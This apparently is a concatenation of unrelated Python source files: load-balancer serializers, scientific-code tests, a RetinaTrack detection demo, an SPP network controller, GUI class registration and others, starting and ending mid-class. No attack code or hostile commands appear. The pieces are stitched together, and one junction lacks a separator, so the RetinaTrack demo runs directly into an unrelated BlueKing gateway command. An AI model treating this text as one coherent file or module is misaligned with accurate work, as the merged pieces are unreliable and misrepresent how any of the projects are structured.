    name = serializers.CharField(required=False)
    tags = serializers.ListField(required=False)
    vip_qos_policy_id = serializers.UUIDField(required=False)

    class Meta:
        model = NoneMeta
        fields = ['admin_state_up', 'description', 'loadbalancer_id', 'name', 'tags', 'vip_qos_policy_id']
class ShowLoadBalancersSerializer(serializers.ModelSerializer):
    """Request payload for showing one load balancer.

    # NOTE(review): the `fields` attribute here is a real request parameter
    # (column selection) and is distinct from `Meta.fields` below.
    """
    loadbalancer_id = serializers.UUIDField(required=True)
    fields = serializers.CharField(required=False)

    class Meta:
        model = NoneMeta
        fields = ['loadbalancer_id', 'fields']
class DeleteLoadBalancersSerializer(serializers.ModelSerializer):
    """Request payload for deleting a load balancer, optionally cascading."""
    loadbalancer_id = serializers.UUIDField(required=True)
    cascade = serializers.BooleanField(required=False)

    class Meta:
        model = NoneMeta
        fields = ['loadbalancer_id', 'cascade']
class GetBalancersStatisticsSerializer(serializers.ModelSerializer):
    """Request payload for fetching a load balancer's statistics."""
    loadbalancer_id = serializers.UUIDField(required=True)

    class Meta:
        model = NoneMeta
        fields = ['loadbalancer_id']
class GetBalancersStatusTreeSerializer(serializers.ModelSerializer):
    """Request payload for fetching a load balancer's status tree."""
    loadbalancer_id = serializers.UUIDField(required=True)

    class Meta:
        model = NoneMeta
        fields = ['loadbalancer_id']
class FailoverBalancersSerializer(serializers.ModelSerializer):
    """Request payload for triggering a load-balancer failover."""
    loadbalancer_id = serializers.UUIDField(required=True)

    class Meta:
        model = NoneMeta
        fields = ['loadbalancer_id']
# Load balancer
class BalancersPoolIdSerializer(serializers.ModelSerializer):
    """Request payload identifying a load-balancer pool by id."""
    pool_id = serializers.UUIDField(required=True)

    class Meta:
        model = NoneMeta
        fields = ['pool_id']
|
import pytest
import numpy as np
from dftfit.io.siesta import SiestaReader
@pytest.mark.siesta
def test_siesta_reader():
    """Check energy, first-row forces and stress parsed from a SIESTA output."""
    directory = 'test_files/siesta'
    filename = 'd3_o_20ev.xml'
    calculation = SiestaReader.from_file(directory, filename)

    assert np.allclose(calculation.energy, -104742.133616)

    expected_forces = np.array([-5.014637520260e-1, -4.224890317363e-1, -1.420257672235e-1])
    assert np.allclose(calculation.forces[0], expected_forces)

    # unit conversion chain: eV/A^3 -> GPa -> bar
    eVA32GPa = 160.21766208  # http://greif.geo.berkeley.edu/~driver/conversions.html
    GPa2Bar = 1e4  # GPa -> bars
    expected_stress = np.array([
        [-2.765925809224e-3, -3.009750267323e-5, 1.171322722617e-4],
        [-2.908082457191e-5, -3.180769833963e-3, -1.264574964357e-4],
        [1.174490293284e-4, -1.258277686581e-4, -1.767562635815e-3],
    ]) * eVA32GPa * GPa2Bar
    assert np.allclose(calculation.stress, expected_stress)
|
import pytest
from dethinker.users.models import User
from dethinker.users.tests.factories import UserFactory
@pytest.fixture(autouse=True)
def media_storage(settings, tmpdir):
    """Point Django's MEDIA_ROOT at a per-test temporary directory (autouse)."""
    settings.MEDIA_ROOT = tmpdir.strpath
@pytest.fixture
def user() -> User:
    """Return a freshly created ``User`` built by ``UserFactory``."""
    return UserFactory()
|
# -*- test-case-name: xquotient.test.historic.test_filter3to4 -*-
"""
Stub database generator for version 3 of L{Filter}.
"""
from axiom.test.historic.stubloader import saveStub
from axiom.dependency import installOn
from xquotient.spam import Filter
# Attribute values baked into the stub database for Filter version 3.
USE_POSTINI_SCORE = True
POSTINI_THRESHHOLD = 0.5
def createDatabase(store):
    """Install a spam ``Filter`` with the fixed Postini settings on *store*."""
    installOn(
        Filter(store=store, usePostiniScore=USE_POSTINI_SCORE,
               postiniThreshhold=POSTINI_THRESHHOLD),
        store)
if __name__ == '__main__':
    # 17723 — presumably the revision identifier recorded with the stub;
    # confirm against axiom.test.historic.stubloader docs.
    saveStub(createDatabase, 17723)
|
import pandas as pd
import zipfile
from os.path import splitext
import numpy as np
from .timers import Timer
class FixedSizeEventReader:
    """
    Iterates over an event file ('.txt' or '.zip') and yields non-overlapping
    event windows, each holding a fixed number of events.
    """

    def __init__(self, path_to_event_file, num_events=10000, start_index=0):
        print('Will use fixed size event windows with {} events'.format(num_events))
        print('Output frame rate: variable')
        # Chunked C-engine CSV reader: each chunk becomes one event window.
        # skiprows skips the header line plus the first `start_index` events.
        self.iterator = pd.read_csv(
            path_to_event_file,
            delim_whitespace=True,
            header=None,
            names=['t', 'x', 'y', 'pol'],
            dtype={'t': np.float64, 'x': np.int16, 'y': np.int16, 'pol': np.int16},
            engine='c',
            skiprows=start_index + 1,
            chunksize=num_events,
            nrows=None,
            memory_map=True,
        )

    def __iter__(self):
        return self

    def __next__(self):
        with Timer('Reading event window from file'):
            return next(self.iterator).values
class FixedDurationEventReader:
    """
    Reads events from a '.txt' or '.zip' file, and packages the events into
    non-overlapping event windows, each of a fixed duration.
    **Note**: This reader is much slower than the FixedSizeEventReader.
    The reason is that the latter can use Pandas' very efficient chunk-based reading scheme implemented in C.
    """
    def __init__(self, path_to_event_file, duration_ms=50.0, start_index=0):
        print('Will use fixed duration event windows of size {:.2f} ms'.format(duration_ms))
        print('Output frame rate: {:.1f} Hz'.format(1000.0 / duration_ms))
        file_extension = splitext(path_to_event_file)[1]
        assert(file_extension in ['.txt', '.zip'])
        self.is_zip_file = (file_extension == '.zip')
        if self.is_zip_file:  # '.zip'
            self.zip_file = zipfile.ZipFile(path_to_event_file)
            files_in_archive = self.zip_file.namelist()
            assert(len(files_in_archive) == 1)  # make sure there is only one text file in the archive
            self.event_file = self.zip_file.open(files_in_archive[0], 'r')
        else:
            self.event_file = open(path_to_event_file, 'r')
        # ignore header + the first start_index lines
        for i in range(1 + start_index):
            self.event_file.readline()
        # Window-start timestamp; initialized lazily from the first event read.
        self.last_stamp = None
        # Window length in seconds (event timestamps are compared in seconds,
        # see the `t > self.last_stamp + self.duration_s` test below).
        self.duration_s = duration_ms / 1000.0
    def __iter__(self):
        return self
    def __del__(self):
        if self.is_zip_file:
            self.zip_file.close()
        self.event_file.close()
    def __next__(self):
        """Return the next window as an (N, 4) array of [t, x, y, pol] rows."""
        with Timer('Reading event window from file'):
            event_list = []
            for line in self.event_file:
                if self.is_zip_file:
                    # zip members are opened in binary mode; decode each line
                    line = line.decode("utf-8")
                t, x, y, pol = line.split(' ')
                t, x, y, pol = float(t), int(x), int(y), int(pol)
                event_list.append([t, x, y, pol])
                if self.last_stamp is None:
                    self.last_stamp = t
                if t > self.last_stamp + self.duration_s:
                    self.last_stamp = t
                    event_window = np.array(event_list)
                    return event_window
            # file exhausted before a full window elapsed
            raise StopIteration
|
from __future__ import print_function
import argparse
import torch
import torch.backends.cudnn as cudnn
import numpy as np
from utils.prior_box import PriorBox
import cv2
from models.model.retinatrack import RetinaTrackNet
from config.config import cfg_re50
from utils.box_utils import decode
import time
import torchvision
import parser
import torch.nn.functional as F
parser = argparse.ArgumentParser(description='RetinaTrack')
parser.add_argument('-m', '--trained_model', default='demo.pth',
                    type=str, help='Trained state_dict file path to open')
parser.add_argument('--confidence_threshold', default=0.6, type=float, help='confidence_threshold')
parser.add_argument('--nms_threshold', default=0.4, type=float, help='nms_threshold')
parser.add_argument('--vis_thres', default=0.6, type=float, help='visualization_threshold')
parser.add_argument('-image', default='source/test.jpg', help='test image path')
args = parser.parse_args()


if __name__ == '__main__':
    cfg = cfg_re50
    model = RetinaTrackNet(cfg=cfg).cuda()
    # Load the checkpoint chosen on the command line (previously hard-coded
    # to 'demo.pth', which made --trained_model a no-op).
    param = torch.load(args.trained_model, map_location=lambda storage, loc: storage.cuda('cuda:0'))
    model.load_state_dict(param)
    model.eval()

    img_raw = cv2.imread(args.image)
    img = cv2.resize(img_raw, (640, 640))
    # cv2 images are HWC; the original `_, im_height, im_width = img.shape`
    # unpacked width as the channel count.
    im_height, im_width, _ = img.shape
    img = img.transpose(2, 0, 1)  # HWC -> CHW
    img = np.ascontiguousarray(img)
    img = torch.from_numpy(img).unsqueeze(0).cuda()
    img = img.cuda().float() / 255.0

    # Factors mapping 640x640 box coordinates back to the original image size.
    scale = torch.Tensor([img_raw.shape[1], img_raw.shape[0], img_raw.shape[1], img_raw.shape[0]]).cuda()
    tic = time.time()
    loc, conf, classifier = model(img)  # forward pass
    priorbox = PriorBox(cfg)
    with torch.no_grad():
        priors = priorbox.forward()
        priors = priors.cuda()
    with torch.no_grad():
        boxes = decode(loc.squeeze(0), priors, cfg['variance'])
        boxes = boxes * scale
        conf = F.softmax(conf, dim=-1)
        scores = conf.squeeze(0).cpu().numpy()[:, 1]
        # Filter by the configurable threshold (was hard-coded to 0.6).
        inds = np.where(scores > args.confidence_threshold)[0]
        boxes = boxes[inds]
        scores = scores[inds]
        scores = torch.from_numpy(scores).cuda().unsqueeze(1)
        classifier = F.softmax(classifier, dim=-1).squeeze(0)
        classifier = classifier.data.max(-1, keepdim=True)[1]
        classifier = classifier[inds].float()
        # dets columns: [x1, y1, x2, y2, score, class]
        dets = torch.cat((boxes, scores, classifier), 1)
        # NMS must rank candidates by confidence (column 4); the original
        # passed the class id (column 5) as the score.
        i = torchvision.ops.boxes.nms(dets[:, :4], dets[:, 4], args.nms_threshold)
        dets = dets[i]
    for b in dets:
        if b[4] < args.vis_thres:
            continue
        text = "car: {:d}".format(int(b[5]))
        print(text)
        b = list(map(int, b))
        cv2.rectangle(img_raw, (b[0], b[1]), (b[2], b[3]), (0, 0, 255), 2)
        cx = b[0]
        cy = b[1] + 12
        cv2.putText(img_raw, text, (cx, cy),
                    cv2.FONT_HERSHEY_DUPLEX, 0.5, (255, 255, 255))
    cv2.imwrite('source/result_img.jpg', img_raw)
# -*- coding: utf-8 -*-
"""
* TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-蓝鲸 PaaS 平台(BlueKing-PaaS) available.
* Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
* You may obtain a copy of the License at http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
* an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
"""
from apigw_manager.apigw.command import DefinitionCommand
from apigw_manager.apigw.helper import ReleaseVersionManager
from apigw_manager.core.fetch import Fetcher
from apigw_manager.core.release import Releaser
class Command(DefinitionCommand):
    """API gateway release a version"""

    default_namespace = "release"
    Fetcher = Fetcher
    Releaser = Releaser

    def add_arguments(self, parser):
        """Register release-specific CLI options on top of the base ones."""
        super().add_arguments(parser)
        parser.add_argument("-t", "--title", default=None, help="resource version title")
        parser.add_argument("-c", "--comment", default="", help="release comment")
        parser.add_argument("-s", "--stage", default=[], nargs="+", help="release stages")

    def _should_create_resource_version(self, resource_version, title):
        # Create a new version when none exists yet, or when the latest one
        # was recorded under a different title.
        return not resource_version or resource_version.get("title") != title

    def get_default_version_title(self, configuration):
        """Derive an auto-incremented title for the gateway's next version."""
        return ReleaseVersionManager().increase(configuration.api_name)

    def handle(self, title, comment, stage, *args, **kwargs):
        """Create a resource version if needed, then release it to `stage`."""
        configuration = self.get_configuration(**kwargs)
        definition = self.get_definition(**kwargs)

        # CLI value wins, then the definition file, then an auto title.
        title = title or definition.get("title") or self.get_default_version_title(configuration=configuration)
        comment = comment or definition.get("comment", "")

        fetcher = self.Fetcher(configuration)
        releaser = self.Releaser(configuration)

        latest = fetcher.latest_resource_version()
        if not self._should_create_resource_version(latest, title):
            print("resource_version already exists and is the latest, skip creating")
            resource_version = latest
        else:
            resource_version = releaser.create_resource_version(title=title, comment=comment)

        result = releaser.release(
            resource_version_name=resource_version["name"],
            comment=comment,
            stage_names=stage,
        )
        print(
            "API gateway released %s, title %s, stages %s"
            % (result["resource_version_name"], result["resource_version_title"], result["stage_names"])
        )
|
#!/usr/bin/env python
# coding: utf-8
r"""STEP morphing example"""
import logging
import pygem as pg
logger = logging.getLogger(__name__)
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s :: %(levelname)6s :: '
                              '%(module)20s :: %(lineno)3d :: %(message)s')
handler.setFormatter(formatter)
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
# Bug fix: only the handler's level was set. The logger itself defaulted to
# the root's effective level (WARNING), so every logger.info() below was
# silently dropped.
logger.setLevel(logging.DEBUG)

logger.info("reading parameters")
params = pg.params.FFDParameters()
params.read_parameters(filename='./example_ffd_step/parameters_ffd_step.prm')

step_handler = pg.stephandler.StepHandler()
mesh_points = step_handler.parse('./example_ffd_step/test_pipe.step')

logger.info("show original")
step_handler.show('./example_ffd_step/test_pipe.step')

logger.info("applying transformation")
free_form = pg.freeform.FFD(params, mesh_points)
free_form.perform()
new_mesh_points = free_form.modified_mesh_points
# iges_handler.write(new_mesh_points, './tutorial_2_iges/test_pipe_mod.iges')

logger.info("writing modified file")
step_handler.write(new_mesh_points,
                   './example_ffd_step/test_pipe_mod.step',
                   1e-3)  # tolerance passed through to the STEP writer

logger.info("showing modified file")
mesh_points = step_handler.parse('./example_ffd_step/test_pipe_mod.step')
step_handler.show()
|
# SPDX-License-Identifier: BSD-3-Clause
# Copyright(c) 2018 Nippon Telegraph and Telephone Corporation
import eventlet
eventlet.monkey_patch()
import argparse
import errno
import json
import logging
import os
import socket
import subprocess
import spp_proc
import spp_webapi
LOG = logging.getLogger(__name__)
MSG_SIZE = 4096
# relative path of `cpu_layout.py`
CPU_LAYOUT_TOOL = 'tools/helpers/cpu_layout.py'
class Controller(object):
    """spp-ctl controller.

    Accepts TCP connections from the SPP primary and secondary processes,
    keeps them in ``self.procs`` keyed by process ID, and exposes them
    through the REST API served by ``spp_webapi.WebServer``.
    """

    def __init__(self, host, pri_port, sec_port, api_port):
        self.web_server = spp_webapi.WebServer(self, host, api_port)
        self.procs = {}  # process ID -> spp_proc.*Proc instance
        self.ip_addr = host
        self.init_connection(pri_port, sec_port)

    def start(self):
        """Run the web API server (blocks)."""
        self.web_server.start()

    def init_connection(self, pri_port, sec_port):
        """Open listening sockets for primary/secondary processes and spawn
        greenthreads that accept connections on them."""
        self.pri_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.pri_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.pri_sock.bind((self.ip_addr, pri_port))
        self.pri_sock.listen(1)
        self.primary_listen_thread = eventlet.greenthread.spawn(
            self.accept_primary)

        self.sec_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sec_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sec_sock.bind((self.ip_addr, sec_port))
        self.sec_sock.listen(1)
        self.secondary_listen_thread = eventlet.greenthread.spawn(
            self.accept_secondary)

    def accept_primary(self):
        """Accept (re)connections from spp_primary forever."""
        while True:
            conn, _ = self.pri_sock.accept()
            proc = self.procs.get(spp_proc.ID_PRIMARY)
            if proc is not None:
                LOG.warning("spp_primary reconnect !")
                with proc.sem:
                    try:
                        proc.conn.close()
                    except Exception:
                        pass
                    proc.conn = conn
                # NOTE: when spp_primary restarts, all secondaries must be
                # restarted. this is out of control of spp-ctl.
            else:
                LOG.info("primary connected.")
                self.procs[spp_proc.ID_PRIMARY] = spp_proc.PrimaryProc(conn)

    def accept_secondary(self):
        """Accept (re)connections from secondary processes forever."""
        while True:
            conn, _ = self.sec_sock.accept()
            LOG.debug("sec accepted: get process id")
            proc = self._get_proc(conn)
            if proc is None:
                LOG.error("get process id failed")
                conn.close()
                continue
            old_proc = self.procs.get(proc.id)
            if old_proc:
                LOG.warning("%s(%d) reconnect !", old_proc.type, old_proc.id)
                if old_proc.type != proc.type:
                    LOG.warning("type changed ! new type: %s", proc.type)
                with old_proc.sem:
                    try:
                        old_proc.conn.close()
                    except Exception:
                        pass
            else:
                LOG.info("%s(%d) connected.", proc.type, proc.id)
            self.procs[proc.id] = proc

    @staticmethod
    def _continue_recv(conn):
        """Drain any remaining reply bytes from `conn` without blocking."""
        try:
            # must set non-blocking to receive remaining data not to happen
            # blocking here.
            # NOTE: usually MSG_DONTWAIT flag is used for this purpose but
            # this flag is not supported under eventlet.
            conn.setblocking(False)
            data = b""
            while True:
                try:
                    rcv_data = conn.recv(MSG_SIZE)
                    data += rcv_data
                    if len(rcv_data) < MSG_SIZE:
                        break
                except socket.error as e:
                    if e.args[0] == errno.EAGAIN:
                        # OK, no data remaining. this happens when received
                        # data length is just a multiple of MSG_SIZE.
                        break
                    raise e
            return data
        finally:
            conn.setblocking(True)

    @staticmethod
    def _send_command(conn, command):
        """Send `command` on `conn` and return the decoded reply (or None)."""
        data = None
        try:
            conn.sendall(command.encode())
            data = conn.recv(MSG_SIZE)
            if data and len(data) == MSG_SIZE:
                # could not receive data at once. receive remaining data.
                # Bug fix: this is a staticmethod, so `self` does not exist;
                # the original `self._continue_recv(conn)` raised NameError
                # whenever a reply spanned multiple MSG_SIZE chunks.
                data += Controller._continue_recv(conn)
            if data:
                data = data.decode()
        except Exception as e:
            LOG.info("Error: {}".format(e))
        return data

    def _get_proc(self, conn):
        # it is a bit ad hoc. send "_get_client_id" command and try to
        # decode reply for each proc type. if success, that is the type.
        data = self._send_command(conn, "_get_client_id")
        for proc in [spp_proc.VfProc, spp_proc.NfvProc, spp_proc.MirrorProc,
                     spp_proc.PcapProc]:
            sec_id = proc._decode_client_id(data)
            if sec_id is not None:
                return proc(sec_id, conn)

    def _update_procs(self):
        """Remove no existing processes from `self.procs`."""
        removed_ids = []
        for idx, proc in self.procs.items():
            if proc.id != spp_proc.ID_PRIMARY:
                try:
                    # Check the process can be accessed. If not, go
                    # to except block.
                    proc.get_status()
                except Exception as e:
                    LOG.error(e)
                    removed_ids.append(idx)
        for idx in removed_ids:
            LOG.info("Remove no existing {}:{}.".format(
                self.procs[idx].type, self.procs[idx].id))
            del self.procs[idx]

    def get_processes(self):
        """Return a list of {'type': ..., 'client-id': ...} for live procs."""
        procs = []
        self._update_procs()
        for proc in self.procs.values():
            p = {"type": proc.type}
            if proc.id != spp_proc.ID_PRIMARY:
                p["client-id"] = proc.id
            procs.append(p)
        return procs

    def get_cpu_usage(self):
        """Get cpu usage from each of status of SPP processes.
        If process returns invalid message or cannot connect, remove
        it from `self.procs` as in _update_procs().
        """
        removed_ids = []
        cpus = []
        for idx, proc in self.procs.items():
            try:
                # Check the process can be accessed. If not, go
                # to except block.
                stat = proc.get_status()
                if proc.id == spp_proc.ID_PRIMARY:
                    cpus.append(
                        {'proc-type': proc.type,
                         'master-lcore': stat['lcores'][0],
                         'lcores': stat['lcores']})
                elif proc.type == 'nfv':
                    cpus.append(
                        {'proc-type': proc.type,
                         'client-id': proc.id,
                         'master-lcore': stat['master-lcore'],
                         'lcores': stat['lcores']})
                elif proc.type in ['vf', 'mirror', 'pcap']:
                    master_lcore = stat['info']['master-lcore']
                    lcores = [stat['info']['master-lcore']]
                    # TODO(yasufum) revise tag name 'core'.
                    for val in stat['info']['core']:
                        lcores.append(val['core'])
                    cpus.append(
                        {'proc-type': proc.type,
                         'client-id': proc.id,
                         'master-lcore': master_lcore,
                         'lcores': lcores})
                else:
                    # Bug fix: the original referenced `roc.type` (typo),
                    # raising NameError on unsupported proc types.
                    LOG.debug('No supported proc type: {}'.format(
                        proc.type))
            except Exception as e:
                LOG.error("get_cpu_usage: {}".format(e))
                removed_ids.append(idx)
        for idx in removed_ids:
            LOG.info("Remove no existing {}:{}.".format(
                self.procs[idx].type, self.procs[idx].id))
            del self.procs[idx]
        return cpus

    def get_cpu_layout(self):
        """Get cpu layout with helper tool 'cpu_layout.py'."""
        # This script is 'src/spp-ctl/spp_ctl.py' and it expect to find
        # the tool in tools/helpers/cpu_layout.py'.
        cmd_path = "{}/../../{}".format(
            os.path.dirname(__file__), CPU_LAYOUT_TOOL)
        if os.path.exists(cmd_path):
            # Get cpu layout as bytes of JSON formatted string
            cmd_res = subprocess.check_output(
                [cmd_path, '--json'],  # required '--json' option
                stderr=subprocess.STDOUT)
            # Decode bytes to str
            return json.loads(cmd_res.decode('utf-8'))
        else:
            LOG.error("'{}' cannot be found.".format(CPU_LAYOUT_TOOL))
            return None

    def do_exit(self, proc_type, proc_id):
        """Forget the process entry matching (proc_type, proc_id), if any."""
        removed_id = None  # remove proc info of ID from self.procs
        for proc in self.procs.values():
            if proc.type == proc_type and proc.id == proc_id:
                removed_id = proc.id
                break
        if removed_id is not None:
            del self.procs[removed_id]
def main():
    """Parse CLI options and run the spp-ctl controller (blocks in start())."""
    parser = argparse.ArgumentParser(description="SPP Controller")
    parser.add_argument("-b", '--bind-addr', type=str, default='localhost',
                        help="bind address, default=localhost")
    parser.add_argument("-p", dest='pri_port', type=int, default=5555,
                        action='store', help="primary port, default=5555")
    parser.add_argument("-s", dest='sec_port', type=int, default=6666,
                        action='store', help="secondary port, default=6666")
    parser.add_argument("-a", dest='api_port', type=int, default=7777,
                        action='store', help="web api port, default=7777")
    args = parser.parse_args()
    logging.basicConfig(level=logging.DEBUG)
    controller = Controller(args.bind_addr, args.pri_port, args.sec_port,
                            args.api_port)
    controller.start()
|
import numpy as np
class Stats:
    """Aggregates load-test results and prints a latency/throughput summary."""

    def __init__(self, workers, total_requests, total_time_sec, times, error_count):
        self.workers = workers
        self.total_requests = total_requests
        self.total_time_sec = total_time_sec
        self.times = times  # per-request latencies in milliseconds
        self.error_count = error_count

    def print(self):
        """Write the formatted summary report to stdout."""
        separator = '----' * 5
        err_rate = round(self.error_count / self.total_requests * 100, 2)
        throughput = self.total_requests / self.total_time_sec

        print(separator)
        print(f'Done! Took {self.total_time_sec} seconds')
        print(f'Number of invokes: {self.total_requests}; Number of workers: {self.workers}')
        print(f'Error rate: {err_rate}% ({self.error_count}/{self.total_requests})')
        print(f'Throughput: {throughput} req/sec')
        print(separator)

        # Latency distribution (percentiles over the recorded times).
        print(f'Max: {np.percentile(self.times, 100)}ms')
        print(f'Min: {np.percentile(self.times, 0)}ms')
        print(f'Average: {np.average(self.times)}ms')
        print(f'Median: {np.percentile(self.times, 50)}ms')
        print(f'Upper 90: {np.percentile(self.times, 90)}ms')
        print(f'Upper 99: {np.percentile(self.times, 99)}ms')
        print(f'STD: {np.std(self.times)}')

        wide_separator = '----' * 10
        print(wide_separator)
        print(wide_separator)
        print()
|
from .boolalg import (to_cnf, to_dnf, to_nnf, And, Or, Not, Xor, Nand, Nor, Implies,
Equivalent, ITE, POSform, SOPform, simplify_logic,
bool_equal, bool_map, true, false)
from .inference import satisfiable
|
# -*- coding: utf-8 -*-
from classes.om import ObjectManager
from classes.ui import UIManager
#
from classes.om import Well
from classes.om import DataIndex
from classes.om import DataIndexMap
from classes.om import Log
from classes.om import CurveSet
from classes.om import Seismic
from classes.om import Spectogram
from classes.om import Gather
#
from classes.ui import FrameController, Frame
from classes.ui import DialogController, Dialog
from classes.ui import LASHeaderController, LASHeader
from classes.ui import WellImportFrameController, WellImportFrame
from classes.ui import MainWindowController, MainWindow
from classes.ui import MenuBarController, MenuBarView
from classes.ui import MenuController, MenuView
from classes.ui import MenuItemController, MenuItemView
from classes.ui import TreeController, TreeView
from classes.ui import ToolBarController, ToolBar
from classes.ui import ToolBarToolController
from classes.ui import StatusBarController, StatusBar
from classes.ui import WellPlotController, WellPlot
from classes.ui import TrackController, TrackView
from classes.ui import TrackObjectController
from classes.ui import NavigatorController, Navigator
from classes.ui import CrossPlotController, CrossPlot
from classes.ui import WorkPageController, WorkPage
from classes.ui import \
LineRepresentationController, LineRepresentationView
from classes.ui import \
IndexRepresentationController, IndexRepresentationView
from classes.ui import \
DensityRepresentationController, DensityRepresentationView
from classes.ui import \
PatchesRepresentationController, PatchesRepresentationView
# ContourfRepresentationController, ContourfRepresentationView
from classes.ui import WellPlotEditorController, \
WellPlotEditor
from classes.ui import LPEWellPlotPanelController, \
LPEWellPlotPanel
from classes.ui import LPETrackPanelController, \
LPETrackPanel
from classes.ui import LPEObjectsPanelController, \
LPEObjectsPanel
#
from classes.ui import PropertyGridController, PropertyGridView
#
from classes.ui import CanvasPlotterController, CanvasPlotter
from classes.ui import TrackCanvasController, TrackCanvas
from classes.ui import TrackLabelController, TrackLabel
#
from classes.ui import \
ObjectPropertiesDialogController, ObjectPropertiesDialog
from classes.ui import ConsoleController, Console
def register_app_classes():
    """Register all application classes with the OM and UI managers."""
    register_OM_classes()
    register_UIManager_classes()
def register_OM_classes():
    """Register data-object classes and their parent-child relationships
    with the ObjectManager (second argument, when given, is the parent type).
    """
    ObjectManager.register_class(Well)
    ObjectManager.register_class(CurveSet, Well)
    ObjectManager.register_class(DataIndex, CurveSet)
    ObjectManager.register_class(Log, CurveSet)
    #
    ObjectManager.register_class(Seismic)
    ObjectManager.register_class(DataIndex, Seismic)
    ObjectManager.register_class(DataIndexMap, Seismic)
    #
    ObjectManager.register_class(DataIndexMap, Log)
    #
    ObjectManager.register_class(Gather, Well)
    ObjectManager.register_class(DataIndex, Gather)
    ObjectManager.register_class(DataIndexMap, Gather)
    #
    # Spectogram can hang off several parents (well, log, gather, seismic).
    ObjectManager.register_class(Spectogram, Well)
    ObjectManager.register_class(DataIndex, Spectogram)
    ObjectManager.register_class(DataIndexMap, Spectogram)
    ObjectManager.register_class(Spectogram, Log)
    ObjectManager.register_class(Spectogram, Gather)
    ObjectManager.register_class(Spectogram, Seismic)
    #
    # The block below is intentionally disabled (kept for future reference).
    """
    # ObjectManager.register_class(IndexSet, Well)
    ObjectManager.register_class(Core, Well)
    #
    #
    ObjectManager.register_class(Partition, Well)
    ObjectManager.register_class(Part, Partition)
    ObjectManager.register_class(Property, Partition)
    ObjectManager.register_class(Property, Part)
    ObjectManager.register_class(Partition) #remover apos alterar pra rocktbale
    ObjectManager.register_class(RockTable)
    ObjectManager.register_class(RockType, RockTable)
    ObjectManager.register_class(Inference, Well)
    ObjectManager.register_class(Part, Inference)
    ObjectManager.register_class(Rock) #remover apos alterar pra rocktbale
    ObjectManager.register_class(Rock, Partition) #remover apos alterar pra rocktbale
    ObjectManager.register_class(Rock, Well) #remover apos alterar pra rocktbale
    ObjectManager.register_class(Fluid)
    #
    ObjectManager.register_class(Seismic)
    # ObjectManager.register_class(IndexSet, Seismic)
    #
    ObjectManager.register_class(Scalogram, Seismic)
    ObjectManager.register_class(DataIndex, Scalogram)
    # ObjectManager.register_class(IndexSet, Scalogram)
    #
    ObjectManager.register_class(DataIndex, WellGather)
    # ObjectManager.register_class(IndexSet, WellGather)
    ObjectManager.register_class(GatherSpectogram, Well)
    ObjectManager.register_class(DataIndex, GatherSpectogram)
    # ObjectManager.register_class(IndexSet, GatherSpectogram)
    #
    ObjectManager.register_class(GatherScalogram, Well)
    ObjectManager.register_class(DataIndex, GatherScalogram)
    # ObjectManager.register_class(IndexSet, GatherScalogram)
    #
    ObjectManager.register_class(Rock, Well)
    ObjectManager.register_class(Fluid, Well)
    #
    # ObjectManager.register_class(DataIndex, IndexSet)
    ObjectManager.register_class(Model1D, Well)
    ObjectManager.register_class(DataIndex, Model1D)
    #
    # ObjectManager.register_class(IndexSet, Model1D)
    #
    ObjectManager.register_class(ZoneSet, Well)
    ObjectManager.register_class(Zone, ZoneSet)
    ObjectManager.register_class(Property, Zone)
    #
    """
def register_UIManager_classes():
    """Register every controller/view (and optional parent controller)
    combination with the UIManager.

    Registration order matches the original hand-written call list; each
    entry is (controller_class, view_class[, parent_controller_class]) and
    is passed straight through to ``UIManager.register_class``.
    """
    registrations = [
        (FrameController, Frame),
        (DialogController, Dialog),
        (MainWindowController, MainWindow),
        (MenuBarController, MenuBarView, MainWindowController),
        (MenuController, MenuView, MenuBarController),
        (MenuController, MenuView, MenuController),
        (MenuItemController, MenuItemView, MenuController),
        (ToolBarController, ToolBar, MainWindowController),
        (ToolBarToolController, None, ToolBarController),
        (TreeController, TreeView, MainWindowController),
        (StatusBarController, StatusBar, MainWindowController),
        #
        (WorkPageController, WorkPage, MainWindowController),
        (WorkPageController, WorkPage, FrameController),
        (WellPlotController, WellPlot, MainWindowController),
        (WellPlotController, WellPlot, FrameController),
        (CrossPlotController, CrossPlot, MainWindowController),
        (CrossPlotController, CrossPlot, FrameController),
        (ConsoleController, Console, MainWindowController),
        (ConsoleController, Console, FrameController),
        #
        (TrackController, TrackView, WellPlotController),
        (TrackObjectController, None, TrackController),
        (WellPlotEditorController, WellPlotEditor, WellPlotController),
        (NavigatorController, Navigator, TrackObjectController),
        #
        (LineRepresentationController, LineRepresentationView,
         TrackObjectController),
        (IndexRepresentationController, IndexRepresentationView,
         TrackObjectController),
        (DensityRepresentationController, DensityRepresentationView,
         TrackObjectController),
        (PatchesRepresentationController, PatchesRepresentationView,
         TrackObjectController),
        # (ContourfRepresentationController, ContourfRepresentationView,
        #  TrackObjectController),
        #
        (LPEWellPlotPanelController, LPEWellPlotPanel, WellPlotEditorController),
        (LPETrackPanelController, LPETrackPanel, WellPlotEditorController),
        (LPEObjectsPanelController, LPEObjectsPanel, WellPlotEditorController),
        (PropertyGridController, PropertyGridView, LPEObjectsPanelController),
        #
        (CanvasPlotterController, CanvasPlotter, CrossPlotController),
        (FrameController, Frame, MainWindowController),
        (TrackCanvasController, TrackCanvas, TrackController),
        (TrackLabelController, TrackLabel, TrackController),
        #
        (ObjectPropertiesDialogController, ObjectPropertiesDialog),
        (PropertyGridController, PropertyGridView,
         ObjectPropertiesDialogController),
        (PropertyGridController, PropertyGridView, LPEWellPlotPanelController),
        # (DataMaskController, DataMask, TrackObjectController),
        (LASHeaderController, LASHeader),
        (WellImportFrameController, WellImportFrame, MainWindowController),
    ]
    for spec in registrations:
        UIManager.register_class(*spec)
|
from django.contrib import admin
from . import models
class QuestionAdmin(admin.ModelAdmin):
    """Admin options for Question: list columns, filters, search, and a
    per-user restriction on the category dropdown."""

